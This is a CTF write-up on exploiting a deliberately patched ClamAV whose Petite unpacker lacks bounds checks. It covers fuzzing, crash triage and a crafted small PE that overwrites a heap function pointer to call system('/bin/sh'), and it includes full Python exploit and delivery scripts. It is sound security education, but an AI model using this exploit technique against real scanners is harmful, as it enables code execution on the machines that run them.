I played Hayyim CTF 2022 with keymoon, st98, and theoremoon. We solved all pwn tasks there and stood the 3rd place. *1
There was a pwn challenge to exploit an anti-virus software, which looked interesting. So, I started on solving it after wiping out all the other challenges.
- Fuzz ClamAV to spot the bug
- Make a small Petite PE
- Achieve arb-size heap oob write primitive
- Overwrite a function pointer used by ClamAV
We're given a set of binary and libraries, and a patch for it.
The binary is ClamAV, an open source antivirus software.
The patch introduces a function named gift
which calls system
function with a meaingless command.
The main part of the patch is the following:
diff -ru clamav/libclamav/petite.c clamav-ctf/libclamav/petite.c --- clamav/libclamav/petite.c 2022-01-11 09:35:04.000000000 +0900 +++ clamav-ctf/libclamav/petite.c 2022-01-25 17:33:58.605682430 +0900 @@ -328,8 +328,8 @@ */ for (q = 0; q < sectcount; q++) { - if (!CLI_ISCONTAINED(sections[q].rva, sections[q].vsz, usects[j].rva, usects[j].vsz)) - continue; + /*if (!CLI_ISCONTAINED(sections[q].rva, sections[q].vsz, usects[j].rva, usects[j].vsz)) + continue;*/ if (!check4resources) { usects[j].rva = sections[q].rva; usects[j].rsz = thisrva - sections[q].rva + size; @@ -365,10 +365,10 @@ * func to get called instead... ehehe very smart ;) */ - if (!CLI_ISCONTAINED(buf, bufsz, ssrc, 1) || !CLI_ISCONTAINED(buf, bufsz, ddst, 1)) { + /*if (!CLI_ISCONTAINED(buf, bufsz, ssrc, 1) || !CLI_ISCONTAINED(buf, bufsz, ddst, 1)) { free(usects); return 1; - } + }*/ size--; *ddst++ = *ssrc++; /* eheh u C gurus gotta luv these monsters :P */ @@ -383,10 +383,10 @@ return 1; } if (!oob) { - if (!CLI_ISCONTAINED(buf, bufsz, ssrc, 1) || !CLI_ISCONTAINED(buf, bufsz, ddst, 1)) { + /*if (!CLI_ISCONTAINED(buf, bufsz, ssrc, 1) || !CLI_ISCONTAINED(buf, bufsz, ddst, 1)) { free(usects); return 1; - } + }*/ *ddst++ = (char)((*ssrc++) ^ (size & 0xff)); size--; } else {
It looks like removing some checks in a file named petite.c
.
One more happy thing is the target binary clamscan
is PIE-disabled.
Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) RUNPATH: b'/home/auviel/clamav-0.104.2/build/libclamav:/home/auviel/clamav-0.104.2/build/libclammspack:' FORTIFY: Enabled
Let's keep in mind that we can call the system
function from PLT.
Since it was late of the CTF when I started solving this challenge, I wanted to know if it's solvable within hours before actually writing the exploit. So, I used a fuzzer to check if the bug could be easily caused.
Instrumenting PUT
The first thing to do is instrumenting the antivirus.
The original ClamAV doesn't seem to support CC
option in Makefile
and I used CMAKE_C_COMPILER
and CMAKE_CXX_COMPILER
on cmake.
build$ cmake .. -D CMAKE_C_COMPILER=afl-gcc -D CMAKE_CXX_COMPILER=afl-g++ build$ make -j8
and it successfully compiled.
Preparing Seed
With great seeds comes great fuzzing.
It's meaningless to use a random file as the seed because it doesn't likely reach the patched code.
We need to prepare a file that likely cause the bug.
The patched file is named petite.c
so I googled what "petite" is.
It seems Petite is a packer for 32-bit Windows executables.
Keymoon found the packer itself was also packed by Petite and I decided to use petite.exe
as the seed file.
Running Fuzzer
I tried fuzzuf for fuzzing the target because I had already built it on my environment but AFL should also work, ofcourse.
There was a big problem on fuzzing ClamAV.
clamscan
needs to load the antivirus database everytime it runs.
It takes about 10 seconds, which makes the fuzzing very laggy.
I found I could pass --database
option to specify the path to the database and it worked relatively fast when I only put bytecode.cvd
and freshclam.dat
in the database directory.
(Please teach me if you know a better way to fuzz slow-responsive executables in AFL.)
Also don't forget to set memory limit because ClamAV consumes large memory.
fuzzuf afl -i input -o output --exec_memlimit 128 -- ./clamav/build/clamscan/clamscan --database=./db @@
After running the fuzzer for 3 or 4 minites, it found some crashes. Yay!
Triaging
We need to check if the crash is actually exploitable. Some bugs such as assertion error or NULL pointer dereference are "crash" but they are usually not exploitable.
Let's check the crash files.
$ ./clamav/build/clamscan/clamscan --database=./db ./output/crashes/id\:000000* Loading: 0s, ETA: 0s [========================>] 92/92 sigs Compiling: 0s, ETA: 0s [========================>] 40/40 tasks Segmentation fault
The result of dmesg shows it's not a trivial (not a definitely-unexploitable) bug.
[65033.884299] clamscan[267713]: segfault at 5555868bd760 ip 00007ffff7b2c260 sp 00007fffffff9a10 error 4 in libclamav.so.9.1.0[7ffff7764000+741000] [65033.884308] Code: 4c 24 08 48 89 44 24 10 48 c7 c1 bf 98 00 00 e8 be 7b 00 00 48 8b 44 24 10 48 8b 4c 24 08 48 8b 14 24 48 8d a4 24 98 00 00 00 <41> 0f b6 16 45 8d 4c 24 ff 4c 8d 40 01 49 83 c6 01 41 81 fc ff ff
Let's debug it on gdb to confirm the exploitability.
$ gdb --args ./clamav/build/clamscan/clamscan --database=./db ./output/crashes/id\:000000* pwndbg> run
The first thing we notice is that it crashed in petite_inflate2x_1to9
function, which is exactly the patched function in this challenge.
It means we found a bug in Petite analyzer at least.
The second thing to check is the exploitability.
The program died at a movzx
instruction as it tried to access an unmapped memory region: 0x5555868bd760
.
This code exists at L374 in libclamav/petite.c
, which is right after the patched code.
size--; *ddst++ = *ssrc++; backbytes = 0; oldback = 0;
It seems we found the intended bug.
Still, we need to check how ddst
and ssrc
are calculated in the program above to see if this bug is likely exploitable.
The invalid pointer r14
is calculated at the following code:
r14
is 0x31303330 and this is a value taken from a part of the PE.
$ hexdump -C output/crashes/id\:000000* | grep "30 33 30 31" 00006bb0 3c 06 03 55 1d 1f 04 35 30 33 30 31 a0 2f a0 2d |<..U...50301./.-|
The offset used to calculate ddst
is also taken from the PE, meaning we have the following primitive.
some_heap_ptr[dst_offset] = some_heap_ptr[src_offset]
This concludes the bug is likely exploitable. (To be more precise, we also need to check how many times the bug can be called. I'll resolve this later.)
Reading the challenge code, it turned out I could not simply use the crash file for writing the exploit because of the following check in wrapper.py
:
if file_size > 10000 or file_size <= 0: print("invalid input\n") exit()
We need to make the exploit very small.
smal pe
Fortunately I had written a template script to generate a small PE when I solved a challenge from Pwn2Win CTF 2021 and I used the script.
To reach the Petite parser, however, it was necessary to fix some broken values in the PE because ClamAV doesn't try to inflate a broken PE.
With --debug
option prints some detailed messages about the error while parsing PE.
I combined it with the traditional print-debug to fix my PE.
Here is the code to generate a valid small PE with 2 sections.
from ptrlib import * num_sections = 2 pe = b'' pe += b'MZ\0\0' pe += b'\0' * 0x38 pe += p32(0x40) pe += b'PE\0\0' pe += p16(0) pe += p16(num_sections) pe += p32(0) pe += p32(0) pe += p32(0) pe += p16(0xe0) pe += p16(2) pe += p16(0x010b) pe += p16(0) pe += p32(0) pe += p32(0) pe += p32(0) pe += p32(0x5100) pe += p32(0) pe += p32(0) pe += p32(0xcafe0000) pe += p32(0x1000) pe += p32(0x200) pe += p16(0) * 6 pe += p32(0) pe += p32(0x1000) pe += p32(0) pe += p32(0) pe += p16(3) pe += p16(0) pe += p32(1) pe += p32(2) pe += p32(3) pe += p32(4) pe += p32(0) pe += p32(0x10) pe += p32(0x400) pe += p32(0x100) pe += p32(0) pe += p32(0) pe += p32(0) * 28 pe += b'.AAAA\0\0\0' pe += p32(0x1000) pe += p32(0x4000) pe += p32(0x10) pe += p32(0x400) pe += p32(0) pe += p32(0) pe += p16(0) * 2 pe += p32(0) pe += b'.BBBB\0\0\0' pe += p32(0x1000) pe += p32(0x5000) pe += p32(0x20) pe += p32(0x500) pe += p32(0) pe += p32(0) pe += p16(0) * 2 pe += p32(0) pe += b'\x00' * (0x400 - len(pe)) pe += b'A' * (0x500 - len(pe)) pe += b'A' * (0x600 - len(pe)) with open("sample.exe", "wb") as f: f.write(pe)
The next thing to do is make ClamAV recognize our PE as Petite-packed. Keymoon helped me to figure our how ClamAV determines the packer.
ClamAV checks packer in cli_scanpe
and from L4000 exists the code to check Petite packer.
The code is small. It seems checking a mov instruction and it's immediate operand at the entry point, which is probably used by the packer for jumping to a specific position of unpacker.
if (epbuff[0] != '\xb8' || (uint32_t)cli_readint32(epbuff + 1) != peinfo->sections[peinfo->nsections - 1].rva + EC32(peinfo->pe_opt.opt32.ImageBase)) { if (peinfo->nsections < 2 || epbuff[0] != '\xb8' || (uint32_t)cli_readint32(epbuff + 1) != peinfo->sections[peinfo->nsections - 2].rva + EC32(peinfo->pe_opt.opt32.ImageBase)) found = 0; else found = 1; }
There are also other checks but they're just some sanity checks and we can pass them without any modifications.
Finally petite_inflate2x_1to9
is called.
However, there are one more check to be passed.
There is a variable named srva
and we need to make it a non-zero and positive value.
if (version == 2) packed = adjbuf + sections[sectcount - 1].rva + 0x1b8; ... srva = cli_readint32(packed); ... size = srva & 0x7fffffff; if (srva != size) { ...
As you can see from the code above, this 32-bit value is taken from offset 0x1b8 of the last section of PE.
This is the very value that caused the crash.
After srva
must have 2 values: size
and thisrva
.
size = cli_readint32(packed + 4); thisrva = cli_readint32(packed + 8);
Now we can write the vulnerability as
adjbuf[thisrva] = adjbuf[srva]
The pointer adjbuf
is defined at the beginning of the function:
char *adjbuf = buf - minrva;
This code looks weird because it's subtracting a value from a base pointer.
buf
is a buffer having the content of the sections of PE.
minrva
is the minimal RVA of all the sections.
As shown in the figure above, the pointer adjbuf
is invalid itself.
It it used with RVA as index so that it can directly access to the sections without converting RVA.
What a scary code.
Time to write exploit :)
Making Primitive
So, adjbuf
points to the invalid heap region above the actual sections.
This means we can overwrite data out-of-bounds not only to the positive direction but also at the negative (small though) offset too.
Anyway, there is still one important thing we need to test: How many bytes can we overwrite?
This is a part of the code around the vulnerability:
... size--; *ddst++ = *ssrc++; backbytes = 0; oldback = 0; while (size > 0) { oob = doubledl(&ssrc, &mydl, buf, bufsz); if (oob == -1) { free(usects); return 1; } if (!oob) { *ddst++ = (char)((*ssrc++) ^ (size & 0xff)); size--; } else { ...
As I explained, we have already confirmed the first *ddst++ = *ssrc++;
can read/write out-of-bounds.
However, this is just 1-byte write and we need more.
After the first write, there is a while-loop that looks like iterating size
times.
We want to call this code in the while-loop to achieve OOB write with arbitrary size.
*ddst++ = (char)((*ssrc++) ^ (size & 0xff));
For this we have to pass the check:
oob = doubledl(&ssrc, &mydl, buf, bufsz); if (oob == -1) { free(usects); return 1; } if (!oob) { ...
The question is what is doubledl
?
This function is defined at the beginning of petite.c
as shown below:
static int doubledl(char **scur, uint8_t *mydlptr, char *buffer, uint32_t buffersize) { unsigned char mydl = *mydlptr; unsigned char olddl = mydl; mydl *= 2; if (!(olddl & 0x7f)) { if (*scur < buffer || *scur >= buffer + buffersize - 1) return -1; olddl = **scur; mydl = olddl * 2 + 1; *scur = *scur + 1; } *mydlptr = mydl; return (olddl >> 7) & 1; }
I don't understand what this function is but there is two clear thing.
- It should not return -1
- We don't want it to return 0
The code below checks if ssrc
is within the section being parsed.
if (*scur < buffer || *scur >= buffer + buffersize - 1) return -1;
It means we cannot read data out-of-bounds. This is not desperate because we still have oob write.
Dynamically debugging the function, I confirmed oob
is not likely be 0.
So, we can reach the following code:
*ddst++ = (char)((*ssrc++) ^ (size & 0xff)); size--;
Since the packer uses a sort of obfuscation, I wrote encoder for it.
def encode(data, size): output = b'' i = 0 for c in data: if i == 0: output += bytes([ c ]) else: output += bytes([ c ^ (size & 0xff) ]) if i % 8 == 0: output += bytes([0]) i += 1 size -= 1 return output
Now we can write as many data as we want unless the size limit allows.
Where to Write
The last thing we need to do is finding a good target to overwrite.
First, the following data attracted my attention:
pwndbg> x/32xg 0x10647f0 - 0x1010 - 0x100 0x10636e0: 0x0000400000000000 0x0000040000001000 0x10636f0: 0x0000500000000100 0x0000060000001000 0x1063700: 0x0000000000000400 0x0000100000005000 0x1063710: 0x0000040000000600 0x0000000000000061 0x1063720: 0x000000000067ed80 0x000000000067e8a0 0x1063730: 0x0000000000000000 0x0000000000000000 0x1063740: 0x0000000000000000 0x0000000000000000 0x1063750: 0x0000000000000000 0x0000000000000000 0x1063760: 0x0000000000000000 0x0000000000000000 0x1063770: 0x0000000000000060 0x0000000000000070 0x1063780: 0x00000000004cb250 0x0000000000424010 0x1063790: 0x0000000000000000 0x0000000000000000 0x10637a0: 0x0000000000000000 0x0000000000000000 0x10637b0: 0x0000000000000000 0x0000000000000000 0x10637c0: 0x0000000000000000 0x0000000000000000 0x10637d0: 0x0000000000000000 0x0000000000000000
The chunk at 0x1063780
is obviously linked to tcache.
I thought of overwriting the link with some GOT address and overwrite GOT. *2
However, when I check it on my host machine and docker, the heap layout changed drastically. It also changes as the virus database changes. So, the exploit will be super unstable even if it's possible.
After checking heap more, I found the following data when I give 2 identical PE files to CalmAV:
pwndbg> x/32xg 0x1063630 - 0x4000 0x105f630: 0x00000000000003fe 0x0000000000000000 0x105f640: 0x0000000000000000 0x07560707005d0000 0x105f650: 0x0000000000480079 0x0000000000000071 0x105f660: 0x00007ffff7dee8f0 0x00007ffff7dee900 0x105f670: 0x0000000000000000 0x0000000000000000 0x105f680: 0x0000000000000000 0x0000000000000000 0x105f690: 0x0000000000000000 0x0000000000000000 0x105f6a0: 0x0000000000000000 0xffffffffffffffff 0x105f6b0: 0x000186a001312d00 0x00000000000007d0 0x105f6c0: 0x0000000001084730 0x0000000000000131 0x105f6d0: 0x00007ffff7dee8f0 0x00007ffff7dee900 0x105f6e0: 0x0000000000000000 0x00007ffff76fbbc0 0x105f6f0: 0x0000000000000000 0x0000000000000000 0x105f700: 0x0000000000000000 0x0000000000000000 0x105f710: 0x0000000000000000 0x0000000000000122 0x105f720: 0x0000042850435245 0x0000000000000428
The pointer such as 0x00007ffff7dee8f0
or 0x00007ffff7dee900
points to machine code region.
It means they are function pointers.
I don't know what function they are and who uses it when, but the chunks are not freed as you can see, which means it's likely to be called.
I wrote an exploit to overwrite them with 0xffffffffdeadbeef
and 0xffffffffcafebabe
and run the exploit.
*RAX 0x0 *RBX 0x7fffab372bf8 ◂— 0x0 *RCX 0x7 *RDX 0x7ffff7d5cbe0 —▸ 0x10e9010 ◂— 0x20 /* ' ' */ *RDI 0x105f660 ◂— 0xffffffffdeadbeef *RSI 0x0 *R8 0x7 *R9 0x7fffffffc3e0 ◂— 0x0 *R10 0xfffffffffffff103 *R11 0x7ffff76865e0 ◂— endbr64 *R12 0x7fffab372bd8 ◂— 0x0 *R13 0x73 *R14 0x194 *R15 0x72 *RBP 0xa *RSP 0x7fffffffc8c8 —▸ 0x7ffff7def2ea ◂— mov qword ptr [rbx + 8], 0 *RIP 0xffffffffcafebabe
Yay!
As you can see, the second function pointer is called with the struct as the first argument.
Therefore, we can call system("/bin/sh\0");
Final Exploit
The offset to the function pointer is still different by the environment, database, and so on. However, it seems to exist around there at least.
I changed to offset 0x10-byte each time and my exploit worked at 0x90 on remote.
from ptrlib import * elf = ELF("share/clamscan") num_sections = 2 pe = b'' pe += b'MZ\0\0' pe += b'\0' * 0x38 pe += p32(0x40) pe += b'PE\0\0' pe += p16(0) pe += p16(num_sections) pe += p32(0) pe += p32(0) pe += p32(0) pe += p16(0xe0) pe += p16(2) pe += p16(0x010b) pe += p16(0) pe += p32(0) pe += p32(0) pe += p32(0) pe += p32(0x5000) pe += p32(0) pe += p32(0) pe += p32(0xcafe0000) pe += p32(0x1000) pe += p32(0x200) pe += p16(0) * 6 pe += p32(0) pe += p32(0x1000) pe += p32(0) pe += p32(0) pe += p16(3) pe += p16(0) pe += p32(1) pe += p32(2) pe += p32(3) pe += p32(4) pe += p32(0) pe += p32(0x10) pe += p32(0x400) pe += p32(0x100) pe += p32(0) pe += p32(0) pe += p32(0) * 28 pe += b'.AAAA\0\0\0' pe += p32(0x1000) pe += p32(0x4000) pe += p32(0x100) pe += p32(0x400) pe += p32(0) pe += p32(0) pe += p16(0) * 2 pe += p32(0) pe += b'.BBBB\0\0\0' pe += p32(0x1000) pe += p32(0x5000) pe += p32(0x5000) pe += p32(0x600) pe += p32(0) pe += p32(0) pe += p16(0) * 2 pe += p32(0) pe += b'\x00' * (0x400 - len(pe)) pe += b'C' * (0x600 - len(pe)) pe += b'\xb8' pe += p32(0xcafe5000) pe += b'A' * (0x1b8 - 5) size = 0x40 pe += p32(0x5300) pe += p32(size) pe += p32(0x90) pe += p32(0xdeadbeef) pe += p32(0) pe += p32(0) pe += p32(0) pe += b'B' * (0x900 - len(pe)) def encode(data, size): output = b'' i = 0 for c in data: if i == 0: output += bytes([ c ]) else: output += bytes([ c ^ (size & 0xff) ]) if i % 8 == 0: output += bytes([0]) i += 1 size -= 1 return output data = b'/bin/sh\0' data += p64(elf.plt("system")) data *= (size // 0x10) pe += encode(data, size) pe += b'B' * (0x2000 - len(pe)) print(len(pe)) with open("sample.exe", "wb") as f: f.write(pe)
from ptrlib import * fs = [ "sample.exe", "sample.exe", ] sock = Socket("nc 141.164.48.191 10000") sock.sendlineafter(": ", str(len(fs))) for f in fs: buf = open(f, "rb").read() assert len(buf) < 10000 sock.sendlineafter(": ", str(len(buf))) sock.sendafter(": ", buf) sock.interactive()
This challenge ended with 1 solve.